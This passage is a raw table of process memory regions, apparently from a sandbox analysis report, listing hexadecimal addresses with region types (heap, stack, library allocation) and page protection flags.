trusted library allocation
|
page read and write
|
||
7FFB4AF80000
|
trusted library allocation
|
page read and write
|
||
9FB000
|
stack
|
page read and write
|
||
13EB1000
|
trusted library allocation
|
page read and write
|
||
156B85A1000
|
trusted library allocation
|
page read and write
|
||
24BF13B000
|
stack
|
page read and write
|
||
156B8668000
|
trusted library allocation
|
page read and write
|
||
B523EBA000
|
stack
|
page read and write
|
||
7FFB4ACD0000
|
trusted library allocation
|
page read and write
|
||
1E195CE4000
|
heap
|
page read and write
|
||
289BFEA1000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
305D000
|
stack
|
page read and write
|
||
289A883C000
|
trusted library allocation
|
page read and write
|
||
289BFE7A000
|
heap
|
page read and write
|
||
25AD000
|
stack
|
page read and write
|
||
7FFB4AAED000
|
trusted library allocation
|
page execute and read and write
|
||
26EE8C45000
|
heap
|
page read and write
|
||
26E80F6F000
|
trusted library allocation
|
page read and write
|
||
24BE753000
|
stack
|
page read and write
|
||
7FFB4ADF0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
230698B5000
|
heap
|
page read and write
|
||
33FE000
|
stack
|
page read and write
|
||
1E1A7CB3000
|
trusted library allocation
|
page read and write
|
||
199000
|
stack
|
page read and write
|
||
289A5B20000
|
heap
|
page read and write
|
||
10CE000
|
stack
|
page read and write
|
||
289A5C20000
|
heap
|
page read and write
|
||
156CF060000
|
heap
|
page read and write
|
||
361F000
|
stack
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page execute and read and write
|
||
81B000
|
heap
|
page read and write
|
||
B9B000
|
heap
|
page read and write
|
||
1E198C0E000
|
trusted library allocation
|
page read and write
|
||
A50000
|
unkown
|
page readonly
|
||
26EEB01F000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7AE000
|
stack
|
page read and write
|
||
26EE8BD0000
|
heap
|
page read and write
|
||
7FFB4AC90000
|
trusted library allocation
|
page execute and read and write
|
||
23069890000
|
heap
|
page read and write
|
||
3A1E000
|
stack
|
page read and write
|
||
7FFB4AF72000
|
trusted library allocation
|
page read and write
|
||
26EEACB0000
|
heap
|
page read and write
|
||
26EEA530000
|
heap
|
page readonly
|
||
32A0000
|
heap
|
page read and write
|
||
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
53C000
|
stack
|
page read and write
|
||
26E90021000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAEB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ABD6000
|
trusted library allocation
|
page execute and read and write
|
||
7BF000
|
heap
|
page read and write
|
||
2E7F000
|
stack
|
page read and write
|
||
8DE387D000
|
stack
|
page read and write
|
||
414000
|
unkown
|
page write copy
|
||
2E73000
|
heap
|
page read and write
|
||
B523B7F000
|
stack
|
page read and write
|
||
7DF4BDCD0000
|
trusted library allocation
|
page execute and read and write
|
||
9C000
|
stack
|
page read and write
|
||
B47000
|
heap
|
page read and write
|
||
156B86E6000
|
trusted library allocation
|
page read and write
|
||
1E1B0360000
|
heap
|
page read and write
|
||
156B8657000
|
trusted library allocation
|
page read and write
|
||
26EEABC0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE50000
|
trusted library allocation
|
page read and write
|
||
309E000
|
stack
|
page read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
26EEB1F0000
|
heap
|
page read and write
|
||
2595CD70000
|
heap
|
page read and write
|
||
289B770C000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE10000
|
trusted library allocation
|
page read and write
|
||
156CF1C0000
|
heap
|
page read and write
|
||
269215D0000
|
unkown
|
page read and write
|
||
7FFB4AAC4000
|
trusted library allocation
|
page read and write
|
||
125E000
|
heap
|
page read and write
|
||
24BEF38000
|
stack
|
page read and write
|
||
7FFB4AE40000
|
trusted library allocation
|
page read and write
|
||
32EF000
|
heap
|
page read and write
|
||
1E197A45000
|
trusted library allocation
|
page read and write
|
||
289BFF20000
|
trusted library allocation
|
page read and write
|
||
E5E2FA000
|
stack
|
page read and write
|
||
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
1E195EFA000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
7FFB4AAC4000
|
trusted library allocation
|
page read and write
|
||
410000
|
unkown
|
page readonly
|
||
400000
|
unkown
|
page readonly
|
||
26EEA6B3000
|
heap
|
page read and write
|
||
289A5A5E000
|
heap
|
page read and write
|
||
2596648A000
|
heap
|
page read and write
|
||
419E000
|
stack
|
page read and write
|
||
2595E7D9000
|
heap
|
page read and write
|
||
A72EDCA000
|
stack
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
7DF44B1E0000
|
trusted library allocation
|
page execute and read and write
|
||
BAB000
|
stack
|
page read and write
|
||
289A78C9000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF90000
|
trusted library allocation
|
page read and write
|
||
1E1A7CAA000
|
trusted library allocation
|
page read and write
|
||
E0F000
|
stack
|
page read and write
|
||
330E000
|
stack
|
page read and write
|
||
7FF668D69000
|
unkown
|
page readonly
|
||
CB1157E000
|
stack
|
page read and write
|
||
7FFB4AE54000
|
trusted library allocation
|
page read and write
|
||
2596148A000
|
heap
|
page read and write
|
||
7E3000
|
unkown
|
page write copy
|
||
26E80001000
|
trusted library allocation
|
page read and write
|
||
2596508A000
|
heap
|
page read and write
|
||
7DF000
|
stack
|
page read and write
|
||
7FFB4AAD4000
|
trusted library allocation
|
page read and write
|
||
156B5009000
|
heap
|
page read and write
|
||
12000
|
unkown
|
page readonly
|
||
1BCE000
|
stack
|
page read and write
|
||
2595EC8A000
|
heap
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
289A76A1000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD40000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
7C3000
|
heap
|
page read and write
|
||
1E1AFDC8000
|
heap
|
page read and write
|
||
7FF68E17C000
|
unkown
|
page write copy
|
||
156CF088000
|
heap
|
page read and write
|
||
156CF38D000
|
heap
|
page read and write
|
||
3EB1000
|
trusted library allocation
|
page read and write
|
||
36CC000
|
stack
|
page read and write
|
||
7FFB4AC60000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE03000
|
trusted library allocation
|
page read and write
|
||
1E1AFDD6000
|
heap
|
page read and write
|
||
804000
|
heap
|
page read and write
|
||
8AE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7FFB4ACB0000
|
trusted library allocation
|
page execute and read and write
|
||
F7975FE000
|
stack
|
page read and write
|
||
7FFB4AE57000
|
trusted library allocation
|
page read and write
|
||
2595E7C9000
|
heap
|
page read and write
|
||
289A7570000
|
heap
|
page read and write
|
||
32E1000
|
heap
|
page read and write
|
||
7FF668D76000
|
unkown
|
page readonly
|
||
12D0000
|
heap
|
page read and write
|
||
7FF68E161000
|
unkown
|
page execute read
|
||
26EEA670000
|
unkown
|
page read and write
|
||
331A000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
7FF6E69A3000
|
unkown
|
page read and write
|
||
7FFB4AF60000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACA4000
|
trusted library allocation
|
page read and write
|
||
24BF0BE000
|
stack
|
page read and write
|
||
156B6AC0000
|
heap
|
page execute and read and write
|
||
289BFD1E000
|
heap
|
page read and write
|
||
32E9000
|
heap
|
page read and write
|
||
3440000
|
heap
|
page read and write
|
||
7FFB4AAC0000
|
trusted library allocation
|
page read and write
|
||
289A7490000
|
trusted library allocation
|
page read and write
|
||
E5E277000
|
stack
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
7FF668D75000
|
unkown
|
page write copy
|
||
7FFB4AACD000
|
trusted library allocation
|
page execute and read and write
|
||
28E0000
|
heap
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
156B6E5E000
|
trusted library allocation
|
page read and write
|
||
131A000
|
heap
|
page read and write
|
||
7FFB4ACB4000
|
trusted library allocation
|
page read and write
|
||
289BFA7E000
|
heap
|
page read and write
|
||
156C6E3C000
|
trusted library allocation
|
page read and write
|
||
289A7450000
|
trusted library allocation
|
page read and write
|
||
7FFB4AEFA000
|
trusted library allocation
|
page read and write
|
||
289A7510000
|
trusted library allocation
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
7FFB4AD00000
|
trusted library allocation
|
page read and write
|
||
7FFB4ABA0000
|
trusted library allocation
|
page read and write
|
||
24BE7DD000
|
stack
|
page read and write
|
||
1E1B016E000
|
heap
|
page read and write
|
||
7FFB4AD60000
|
trusted library allocation
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
32FC000
|
heap
|
page read and write
|
||
289BFEDF000
|
heap
|
page read and write
|
||
7FFB4ACA1000
|
trusted library allocation
|
page read and write
|
||
26EEB091000
|
heap
|
page read and write
|
||
7FF668D69000
|
unkown
|
page readonly
|
||
1E1994B2000
|
trusted library allocation
|
page read and write
|
||
2E40000
|
heap
|
page read and write
|
||
26EEAEE7000
|
heap
|
page read and write
|
||
A4A000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
289A83B9000
|
trusted library allocation
|
page read and write
|
||
2595E7EC000
|
heap
|
page read and write
|
||
7FF668D76000
|
unkown
|
page readonly
|
||
169F000
|
stack
|
page read and write
|
||
7DF44B1D0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ABE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AB80000
|
trusted library allocation
|
page execute and read and write
|
||
2595F68A000
|
heap
|
page read and write
|
||
26E902F4000
|
trusted library allocation
|
page read and write
|
||
7FF6687E0000
|
unkown
|
page readonly
|
||
980000
|
heap
|
page read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
26EEA570000
|
trusted library allocation
|
page read and write
|
||
7FF668D72000
|
unkown
|
page write copy
|
||
156B4F57000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
7FFB4ABA6000
|
trusted library allocation
|
page execute and read and write
|
||
16E0000
|
heap
|
page read and write
|
||
156B4F10000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FFB4AAF2000
|
trusted library allocation
|
page read and write
|
||
26EE8BB0000
|
heap
|
page read and write
|
||
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACAA000
|
trusted library allocation
|
page read and write
|
||
3B4B000
|
stack
|
page read and write
|
||
7FF668D70000
|
unkown
|
page read and write
|
||
162A6990000
|
heap
|
page read and write
|
||
7CD000
|
heap
|
page read and write
|
||
26E81E43000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAD0000
|
trusted library allocation
|
page read and write
|
||
26E81BB7000
|
trusted library allocation
|
page read and write
|
||
300F000
|
stack
|
page read and write
|
||
7FFB4AC10000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AC70000
|
trusted library allocation
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
A72ECCC000
|
stack
|
page read and write
|
||
2D7F000
|
stack
|
page read and write
|
||
305E000
|
stack
|
page read and write
|
||
156C6B81000
|
trusted library allocation
|
page read and write
|
||
156B5175000
|
heap
|
page read and write
|
||
2595E7D8000
|
heap
|
page read and write
|
||
24EBE1D0000
|
heap
|
page read and write
|
||
289A5AE4000
|
heap
|
page read and write
|
||
7FFB4AAE0000
|
trusted library allocation
|
page read and write
|
||
2ECF000
|
stack
|
page read and write
|
||
7FF6687E0000
|
unkown
|
page readonly
|
||
289BFE95000
|
heap
|
page read and write
|
||
7C9000
|
heap
|
page read and write
|
||
7FFB4ABE0000
|
trusted library allocation
|
page execute and read and write
|
||
25963C8A000
|
heap
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
156B5120000
|
heap
|
page read and write
|
||
26E80DC0000
|
trusted library allocation
|
page read and write
|
||
289BFC23000
|
heap
|
page read and write
|
||
7FFB4AED0000
|
trusted library allocation
|
page read and write
|
||
7E0000
|
unkown
|
page readonly
|
||
2C40000
|
heap
|
page read and write
|
||
2595E7E4000
|
heap
|
page read and write
|
||
12F0000
|
heap
|
page read and write
|
||
1370000
|
trusted library allocation
|
page read and write
|
||
9EB09FF000
|
stack
|
page read and write
|
||
289BFE4D000
|
heap
|
page read and write
|
||
118E000
|
stack
|
page read and write
|
||
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
286E000
|
stack
|
page read and write
|
||
A93000
|
unkown
|
page write copy
|
||
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
10000
|
unkown
|
page readonly
|
||
26E80B7F000
|
trusted library allocation
|
page read and write
|
||
7FF68E17B000
|
unkown
|
page read and write
|
||
26EEA830000
|
heap
|
page execute and read and write
|
||
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACA2000
|
trusted library allocation
|
page read and write
|
||
1E195CE0000
|
heap
|
page read and write
|
||
289A7690000
|
heap
|
page read and write
|
||
156B7696000
|
trusted library allocation
|
page read and write
|
||
1E198B63000
|
trusted library allocation
|
page read and write
|
||
437E2FF000
|
stack
|
page read and write
|
||
7FFB4AB7C000
|
trusted library allocation
|
page execute and read and write
|
||
156B51B0000
|
heap
|
page read and write
|
||
1E199795000
|
trusted library allocation
|
page read and write
|
||
156B6B40000
|
heap
|
page read and write
|
||
A72E07E000
|
stack
|
page read and write
|
||
7FFB4AF56000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
289A9108000
|
trusted library allocation
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
24BF1BE000
|
stack
|
page read and write
|
||
289BFED0000
|
heap
|
page read and write
|
||
7FFB4AC80000
|
trusted library allocation
|
page execute and read and write
|
||
289B79A4000
|
trusted library allocation
|
page read and write
|
||
26EEAD58000
|
heap
|
page read and write
|
||
CB115FF000
|
stack
|
page read and write
|
||
797000
|
heap
|
page read and write
|
||
289C01D0000
|
heap
|
page read and write
|
||
2595CF89000
|
heap
|
page read and write
|
||
24EBE1B0000
|
heap
|
page read and write
|
||
344E000
|
stack
|
page read and write
|
||
7FF6E699C000
|
unkown
|
page readonly
|
||
38E0000
|
heap
|
page read and write
|
||
CB1147D000
|
stack
|
page read and write
|
||
414000
|
unkown
|
page write copy
|
||
131B000
|
heap
|
page read and write
|
||
156B4F6F000
|
heap
|
page read and write
|
||
1E197710000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADE0000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB4C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AF00000
|
trusted library allocation
|
page execute and read and write
|
||
7FF668D75000
|
unkown
|
page write copy
|
||
1FCE000
|
stack
|
page read and write
|
||
7FFB4ACF0000
|
trusted library allocation
|
page read and write
|
||
24BFB8C000
|
stack
|
page read and write
|
||
C92000
|
heap
|
page read and write
|
||
469E000
|
stack
|
page read and write
|
||
156B8034000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF50000
|
trusted library allocation
|
page read and write
|
||
156B7DE3000
|
trusted library allocation
|
page read and write
|
||
26E81A0F000
|
trusted library allocation
|
page read and write
|
||
156CF3B4000
|
heap
|
page read and write
|
||
7FF6687E1000
|
unkown
|
page execute read
|
||
394E000
|
stack
|
page read and write
|
||
289BFD00000
|
heap
|
page read and write
|
||
7FFB4AF3D000
|
trusted library allocation
|
page read and write
|
||
26921650000
|
unkown
|
page read and write
|
||
2D2C000
|
stack
|
page read and write
|
||
2595E930000
|
heap
|
page read and write
|
||
EF0000
|
heap
|
page read and write
|
||
1080000
|
heap
|
page read and write
|
||
7FFB4AE30000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADA5000
|
trusted library allocation
|
page read and write
|
||
7FFB4AB0B000
|
trusted library allocation
|
page read and write
|
||
2E60000
|
heap
|
page read and write
|
||
26AD000
|
stack
|
page read and write
|
||
7FFB4ADA0000
|
trusted library allocation
|
page read and write
|
||
7E5000
|
unkown
|
page readonly
|
||
380E000
|
stack
|
page read and write
|
||
7FFB4AF0C000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACD7000
|
trusted library allocation
|
page read and write
|
||
7FFB4ADC2000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD80000
|
trusted library allocation
|
page read and write
|
||
320E000
|
stack
|
page read and write
|
||
7FFB4ACD4000
|
trusted library allocation
|
page read and write
|
||
26E902EA000
|
trusted library allocation
|
page read and write
|
||
7FF6687E1000
|
unkown
|
page execute read
|
||
32F8000
|
heap
|
page read and write
|
||
7FFB4AD30000
|
trusted library allocation
|
page read and write
|
||
28C0000
|
heap
|
page read and write
|
||
1DF4F000
|
stack
|
page read and write
|
||
269213B0000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
7E1000
|
heap
|
page read and write
|
||
156B7827000
|
trusted library allocation
|
page read and write
|
||
289BFDFA000
|
heap
|
page read and write
|
||
26EEA6A5000
|
heap
|
page read and write
|
||
156C6E44000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE59000
|
trusted library allocation
|
page read and write
|
||
289C0080000
|
heap
|
page read and write
|
||
A4E000
|
heap
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
7FF68E6F2000
|
unkown
|
page read and write
|
||
24EBE370000
|
heap
|
page read and write
|
||
7FFB4AEF6000
|
trusted library allocation
|
page read and write
|
||
8DF000
|
stack
|
page read and write
|
||
48E0000
|
heap
|
page read and write
|
||
156B8365000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF30000
|
trusted library allocation
|
page execute and read and write
|
||
3110000
|
heap
|
page read and write
|
||
420000
|
heap
|
page read and write
|
||
289A8681000
|
trusted library allocation
|
page read and write
|
||
A7A000
|
heap
|
page read and write
|
||
7FFB4ACA2000
|
trusted library allocation
|
page read and write
|
||
1CD70000
|
heap
|
page read and write
|
||
289BFEEF000
|
heap
|
page read and write
|
||
156CF500000
|
heap
|
page read and write
|
||
BA2000
|
heap
|
page read and write
|
||
1E1B0136000
|
heap
|
page read and write
|
||
7FFB4ADB0000
|
trusted library allocation
|
page read and write
|
||
230698D0000
|
heap
|
page read and write
|
||
2595E730000
|
heap
|
page read and write
|
||
156B8029000
|
trusted library allocation
|
page read and write
|
||
9F6000
|
stack
|
page read and write
|
||
7FFB4AECA000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF2E000
|
trusted library allocation
|
page read and write
|
||
A0E000
|
stack
|
page read and write
|
||
7FF6E69A8000
|
unkown
|
page readonly
|
||
289BFDA0000
|
heap
|
page read and write
|
||
7FFB4AF30000
|
trusted library allocation
|
page read and write
|
||
F7D000
|
stack
|
page read and write
|
||
370E000
|
stack
|
page read and write
|
||
375F000
|
stack
|
page read and write
|
||
AA5000
|
unkown
|
page readonly
|
||
26E81AB4000
|
trusted library allocation
|
page read and write
|
||
E5DFF9000
|
stack
|
page read and write
|
||
32BD000
|
stack
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
7FFB4AAED000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4ADC0000
|
trusted library allocation
|
page read and write
|
||
7FF6687FC000
|
unkown
|
page write copy
|
||
7FFB4AF92000
|
trusted library allocation
|
page read and write
|
||
B524C09000
|
stack
|
page read and write
|
||
156B84D8000
|
trusted library allocation
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
13A0000
|
heap
|
page read and write
|
||
12FC000
|
heap
|
page read and write
|
||
156B8305000
|
trusted library allocation
|
page read and write
|
||
156CF0D5000
|
heap
|
page read and write
|
||
156B81DE000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF70000
|
trusted library allocation
|
page read and write
|
||
289BFA7C000
|
heap
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
7FFB4AE30000
|
trusted library allocation
|
page read and write
|
||
24BEBFF000
|
stack
|
page read and write
|
||
156B6B51000
|
trusted library allocation
|
page read and write
|
||
2595E8A0000
|
direct allocation
|
page execute and read and write
|
||
7FF668D72000
|
unkown
|
page write copy
|
||
7FFB4AEF0000
|
trusted library allocation
|
page read and write
|
||
26E80229000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD50000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACC0000
|
trusted library allocation
|
page read and write
|
||
24BEC7A000
|
stack
|
page read and write
|
||
7E0000
|
unkown
|
page readonly
|
||
F10000
|
heap
|
page read and write
|
||
32EC000
|
heap
|
page read and write
|
||
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
156B4F97000
|
heap
|
page read and write
|
||
F7975EE000
|
stack
|
page read and write
|
||
351E000
|
stack
|
page read and write
|
||
804000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
2E3F000
|
stack
|
page read and write
|
||
3C4C000
|
stack
|
page read and write
|
||
7FFB4ABA6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFB4AD40000
|
trusted library allocation
|
page read and write
|
||
289BFC43000
|
heap
|
page read and write
|
||
46E000
|
stack
|
page read and write
|
||
26EEB05B000
|
heap
|
page read and write
|
||
289B76D1000
|
trusted library allocation
|
page read and write
|
||
2A8E000
|
stack
|
page read and write
|
||
289BFAC1000
|
heap
|
page read and write
|
||
8FA000
|
stack
|
page read and write
|
||
B0B000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
379E000
|
stack
|
page read and write
|
||
7FFB4AC71000
|
trusted library allocation
|
page read and write
|
||
25965A8A000
|
heap
|
page read and write
|
||
5A0000
|
heap
|
page read and write
|
||
26EEB03D000
|
heap
|
page read and write
|
||
803000
|
heap
|
page read and write
|
||
7FFB4AC7A000
|
trusted library allocation
|
page read and write
|
||
7FFB4AF67000
|
trusted library allocation
|
page read and write
|
||
3315000
|
heap
|
page read and write
|
||
13000
|
unkown
|
page write copy
|
||
441E000
|
stack
|
page read and write
|
||
470000
|
heap
|
page read and write
|
||
2FFE000
|
stack
|
page read and write
|
||
26EEAF59000
|
heap
|
page read and write
|
||
7FFB4AAD3000
|
trusted library allocation
|
page execute and read and write
|
||
B523A7E000
|
stack
|
page read and write
|
||
26EEA5B0000
|
trusted library allocation
|
page read and write
|
||
3324000
|
heap
|
page read and write
|
||
24BEB79000
|
stack
|
page read and write
|
||
7FF6687FB000
|
unkown
|
page write copy
|
||
B523AF9000
|
stack
|
page read and write
|
||
1E1A79D0000
|
trusted library allocation
|
page read and write
|
||
26EEA350000
|
heap
|
page read and write
|
||
156B6A37000
|
heap
|
page execute and read and write
|
||
162A6DB0000
|
heap
|
page read and write
|
||
7FFB4AE50000
|
trusted library allocation
|
page read and write
|
||
1120000
|
heap
|
page read and write
|
||
289B798C000
|
trusted library allocation
|
page read and write
|
||
389F000
|
stack
|
page read and write
|
||
26EEB05F000
|
heap
|
page read and write
|
||
1E195CE8000
|
heap
|
page read and write
|
||
B5238FE000
|
stack
|
page read and write
|
||
437E27F000
|
stack
|
page read and write
|
||
B523E38000
|
stack
|
page read and write
|
||
26E81A6D000
|
trusted library allocation
|
page read and write
|
||
A72DD7E000
|
stack
|
page read and write
|
||
1E19892C000
|
trusted library allocation
|
page read and write
|
||
7FFB4AD70000
|
trusted library allocation
|
page read and write
|
||
2FEE000
|
stack
|
page read and write
|
||
2C7E000
|
stack
|
page read and write
|
||
1323000
|
heap
|
page read and write
|
||
289BFAF5000
|
heap
|
page read and write
|
||
7FFB4AC62000
|
trusted library allocation
|
page read and write
|
||
3314000
|
heap
|
page read and write
|
||
2CA0000
|
heap
|
page read and write
|
||
289A758A000
|
heap
|
page read and write
|
||
9C5000
|
heap
|
page read and write
|
||
815000
|
heap
|
page read and write
|
||
39DF000
|
stack
|
page read and write
|
||
7FFB4AE20000
|
trusted library allocation
|
page read and write
|
||
32EF000
|
heap
|
page read and write
|
||
125A000
|
heap
|
page read and write
|
||
81B000
|
heap
|
page read and write
|
||
B0F000
|
heap
|
page read and write
|
||
156B7501000
|
trusted library allocation
|
page read and write
|
||
26EEB063000
|
heap
|
page read and write
|
||
A72DF77000
|
stack
|
page read and write
|
||
7FF68E6F6000
|
unkown
|
page readonly
|
||
3EDF000
|
stack
|
page read and write
|
||
156B769D000
|
trusted library allocation
|
page read and write
|
||
12257FE000
|
stack
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
678000
|
heap
|
page read and write
|
||
2DCF000
|
stack
|
page read and write
|
||
7FFB4AE68000
|
trusted library allocation
|
page read and write
|
||
A92000
|
unkown
|
page readonly
|
||
156B7CA8000
|
trusted library allocation
|
page read and write
|
||
13C0000
|
heap
|
page read and write
|
||
24BFC0A000
|
stack
|
page read and write
|
||
7FFB4AE00000
|
trusted library allocation
|
page read and write
|
||
E5F04B000
|
stack
|
page read and write
|
||
26E9006C000
|
trusted library allocation
|
page read and write
|
||
32F4000
|
heap
|
page read and write
|
||
289A7480000
|
heap
|
page readonly
|
||
289B76A1000
|
trusted library allocation
|
page read and write
|
||
7FFB4ACB0000
|
trusted library allocation
|
page execute and read and write
|
||
D60000
|
heap
|
page read and write
|
||
1E195ED0000
|
heap
|
page read and write
|
||
53E000
|
stack
|
page read and write
|
||
2E70000
|
heap
|
page read and write
|
||
26EEA450000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
A72DFF9000
|
stack
|
page read and write
|
||
7FFB4AAF4000
|
trusted library allocation
|
page read and write
|
||
7FFB4AAC3000
|
trusted library allocation
|
page execute and read and write
|
||
289BFC33000
|
heap
|
page read and write
|
||
29DD000
|
stack
|
page read and write
|
||
7FFB4AE50000
|
trusted library allocation
|
page read and write
|
||
289A5C00000
|
heap
|
page read and write
|
||
7FFB4AEC3000
|
trusted library allocation
|
page read and write
|
||
13EB7000
|
trusted library allocation
|
page read and write
|
||
2595CF02000
|
heap
|
page read and write
|
||
E5E17D000
|
stack
|
page read and write
|
||
134A000
|
heap
|
page read and write
|
||
26EE8CDA000
|
heap
|
page read and write
|
||
7FFB4AD40000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE50000
|
trusted library allocation
|
page read and write
|
||
A72ED4B000
|
stack
|
page read and write
|
||
2E2C000
|
stack
|
page read and write
|
||
7C1000
|
heap
|
page read and write
|
||
BBB000
|
heap
|
page read and write
|
||
26EEA4F0000
|
trusted library section
|
page read and write
|
||
2F7C000
|
stack
|
page read and write
|
||
CB1167E000
|
stack
|
page read and write
|
||
7FF668D67000
|
unkown
|
page read and write
|
||
7FF6687E0000
|
unkown
|
page readonly
|
||
4F0000
|
heap
|
page read and write
|
||
7E2000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
323F000
|
stack
|
page read and write
|
||
156B8334000
|
trusted library allocation
|
page read and write
|
||
13EB9000
|
trusted library allocation
|
page read and write
|
||
31BE000
|
stack
|
page read and write
|
||
26E81AF9000
|
trusted library allocation
|
page read and write
|
||
E5DBB3000
|
stack
|
page read and write
|
||
AAA000
|
heap
|
page read and write
|
||
7FFB4AD20000
|
trusted library allocation
|
page read and write
|
||
2595CF1B000
|
heap
|
page read and write
|
||
72A000
|
heap
|
page read and write
|
||
CB117FF000
|
stack
|
page read and write
|
||
2E5F000
|
stack
|
page read and write
|
||
2596008A000
|
heap
|
page read and write
|
||
C4A000
|
heap
|
page read and write
|
||
7F9000
|
heap
|
page read and write
|
||
15000
|
unkown
|
page readonly
|
||
2595CF2B000
|
heap
|
page read and write
|
||
156B4F4F000
|
heap
|
page read and write
|
||
156B5150000
|
trusted library section
|
page read and write
|
||
A72DC7E000
|
stack
|
page read and write
|
||
809000
|
heap
|
page read and write
|
||
1E195CB2000
|
heap
|
page read and write
|
||
3DDE000
|
stack
|
page read and write
|
||
7FFB4AB86000
|
trusted library allocation
|
page read and write
|
||
7CA000
|
heap
|
page read and write
|
||
2E78000
|
heap
|
page read and write
|
||
156B82D2000
|
trusted library allocation
|
page read and write
|
||
7FF668D76000
|
unkown
|
page readonly
|
||
B52403C000
|
stack
|
page read and write
|
||
72E000
|
heap
|
page read and write
|
||
CA7000
|
heap
|
page read and write
|
||
E5E0F9000
|
stack
|
page read and write
|
||
EF6000
|
stack
|
page read and write
|
||
7FFB4AB70000
|
trusted library allocation
|
page read and write
|
||
7FF68E160000
|
unkown
|
page readonly
|
||
26EEAD6F000
|
heap
|
page read and write
|
||
324F000
|
stack
|
page read and write
|
||
289BFE3B000
|
heap
|
page read and write
|
||
2595CE99000
|
heap
|
page read and write
|
||
289A5AA8000
|
heap
|
page read and write
|
||
156CF0C0000
|
heap
|
page read and write
|
||
26EEAD8A000
|
heap
|
page read and write
|
||
BE0000
|
heap
|
page read and write
|
||
3140000
|
heap
|
page read and write
|
||
7FFB4AE03000
|
trusted library allocation
|
page read and write
|
||
1E34B000
|
stack
|
page read and write
|
||
2FB8000
|
heap
|
page read and write
|
||
81D000
|
heap
|
page read and write
|
||
156B7DED000
|
trusted library allocation
|
page read and write
|
||
7FFB4AE94000
|
trusted library allocation
|
page read and write
|
||
1100000
|
heap
|
page read and write
|
||
156B84BD000
|
trusted library allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
7FFB4AAF0000
|
trusted library allocation
|
page read and write
|
||
26E812DD000
|
trusted library allocation
|
page read and write
|
||
14E0000
|
heap
|
page read and write
|
||
26EEB340000
|
heap
|
page read and write
|
||
7FFB4AED0000
|
trusted library allocation
|
page read and write
|
||
156B51B5000
|
heap
|
page read and write
|
||
156B862E000
|
trusted library allocation
|
page read and write
|
||
32E8000
|
heap
|
page read and write
|
||
11E0000
|
heap
|
page read and write
|
||
E5E1F9000
|
stack
|
page read and write
|
||
2C7D000
|
